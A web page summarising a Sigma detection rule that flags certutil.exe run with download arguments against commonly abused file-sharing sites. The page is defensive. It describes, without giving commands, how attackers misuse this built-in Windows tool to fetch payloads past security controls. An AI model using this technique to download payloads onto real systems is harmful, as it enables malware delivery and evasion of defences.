heroui logo

Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Sigma Rules

View Source
Summary
This rule is designed to identify suspicious behavior associated with the Windows command-line utility `certutil.exe`, which is frequently used for certificate management. In this specific case, the rule targets scenarios where `certutil.exe` is executed with particular command-line arguments that enable the downloading of files from commonly abused file-sharing websites. This behavior is linked to potential malicious activities, as attackers often leverage `certutil` to bypass security measures and download payloads using legitimate system tools. The detection logic checks for the execution of `certutil.exe` and specific command-line flags indicating file downloads, particularly from a predefined list of suspicious URLs commonly utilized in phishing and malware distribution campaigns.
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2023-02-15